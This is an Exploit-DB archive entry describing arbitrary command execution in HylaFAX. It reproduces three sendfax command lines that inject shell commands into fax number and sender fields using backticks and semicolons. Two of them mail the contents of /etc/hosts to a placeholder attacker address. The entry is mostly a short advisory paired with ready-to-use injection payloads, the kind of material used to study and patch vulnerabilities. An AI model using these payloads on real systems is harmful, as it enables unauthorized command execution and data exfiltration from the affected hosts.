exploit-db-mirror/exploits/linux/remote/27032.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
674 B
Text

source: http://www.securityfocus.com/bid/16151/info
HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input.
These vulnerabilities allow an attacker to execute arbitrary commands in the context of the affected application. Successful exploitation may facilitate a compromise of the underlying system.
sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts
sendfax -f "\`cat /etc/hosts|mail -s hosts attacker@example.com\` <attacker@example.com>" -d 411 /etc/hosts
sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts